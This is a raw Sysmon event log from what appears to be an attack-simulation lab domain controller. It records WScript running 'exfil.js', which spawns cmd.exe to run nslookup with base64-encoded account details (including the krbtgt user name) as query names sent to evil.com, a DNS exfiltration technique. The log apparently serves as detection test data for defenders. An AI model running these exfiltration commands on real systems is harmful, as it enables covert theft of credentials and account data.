354300x8000000000000000202939Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.862{00000000-0000-0000-0000-000000000000}8016<unknown process>-udptruefalse127.0.0.1-52928-false127.0.0.1-53domain 354300x8000000000000000202938Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.785{00000000-0000-0000-0000-000000000000}7264<unknown process>-udpfalsefalse127.0.0.1-52927-false127.0.0.1-53domain 354300x8000000000000000202937Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.785{00000000-0000-0000-0000-000000000000}7264<unknown process>-udptruefalse127.0.0.1-52927-false127.0.0.1-53domain 354300x8000000000000000202936Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.785{00000000-0000-0000-0000-000000000000}7264<unknown process>-udpfalsefalse127.0.0.1-52926-false127.0.0.1-53domain 354300x8000000000000000202935Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.637{00000000-0000-0000-0000-000000000000}7836<unknown process>-udpfalsefalse127.0.0.1-52923-false127.0.0.1-53domain 354300x8000000000000000202934Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.579{00000000-0000-0000-0000-000000000000}8160<unknown process>-udpfalsefalse127.0.0.1-52920-false127.0.0.1-53domain 354300x8000000000000000202933Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.578{00000000-0000-0000-0000-000000000000}8160<unknown process>-udpfalsefalse127.0.0.1-52918-false127.0.0.1-53domain 354300x8000000000000000202932Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.525{00000000-0000-0000-0000-000000000000}7528<unknown process>-udpfalsefalse127.0.0.1-52917-false127.0.0.1-53domain 10341000x8000000000000000202931Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.444{2E1864BB-17C8-629A-7741-000000005F02}40404572C:\Windows\system32\conhost.exe{2E1864BB-17C8-629A-7841-000000005F02}6084C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202930Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.442{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202929Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.442{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202928Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.442{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202927Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.442{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202926Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.441{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C8-629A-7841-000000005F02}6084C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000202925Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.441{2E1864BB-17C8-629A-7641-000000005F02}29442056C:\Windows\system32\cmd.exe{2E1864BB-17C8-629A-7841-000000005F02}6084C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000202924Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.441{2E1864BB-17C8-629A-7841-000000005F02}6084C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IGtyYnRndA== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17C8-629A-7641-000000005F02}2944C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IGtyYnRndA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlekku.tmp 2>&1 10341000x8000000000000000202923Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.422{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17C8-629A-7741-000000005F02}4040C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202922Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.422{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17C8-629A-7741-000000005F02}4040C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202921Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.407{2E1864BB-17C8-629A-7741-000000005F02}40404572C:\Windows\system32\conhost.exe{2E1864BB-17C8-629A-7641-000000005F02}2944C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202920Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.407{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C8-629A-7741-000000005F02}4040C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000202919Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.391{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202918Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.391{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202917Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.391{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202916Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.391{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202915Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.391{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C8-629A-7641-000000005F02}2944C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000202914Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.391{2E1864BB-17A1-629A-783D-000000005F02}55526172C:\Windows\System32\WScript.exe{2E1864BB-17C8-629A-7641-000000005F02}2944C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000202913Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.403{2E1864BB-17C8-629A-7641-000000005F02}2944C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IGtyYnRndA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlekku.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000202912Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.391{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlljiiz.tmpMD5=6549F05B1861103256248974C2999EAD,SHA256=419CF8C4CFB601A92C88A029ACF678E4FE5D927543E581B1FD8233D6D0B2C4E4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000202911Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.376{2E1864BB-17C8-629A-7441-000000005F02}72047224C:\Windows\system32\conhost.exe{2E1864BB-17C8-629A-7541-000000005F02}1636C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202910Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.376{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202909Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.376{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202908Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.376{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202907Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.376{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202906Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.376{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17C8-629A-7541-000000005F02}1636C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000202905Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.376{2E1864BB-17C8-629A-7341-000000005F02}64325420C:\Windows\system32\cmd.exe{2E1864BB-17C8-629A-7541-000000005F02}1636C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000202904Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.376{2E1864BB-17C8-629A-7541-000000005F02}1636C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17C8-629A-7341-000000005F02}6432C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlljiiz.tmp 2>&1 10341000x8000000000000000202903Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.344{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17C8-629A-7441-000000005F02}7204C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202902Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 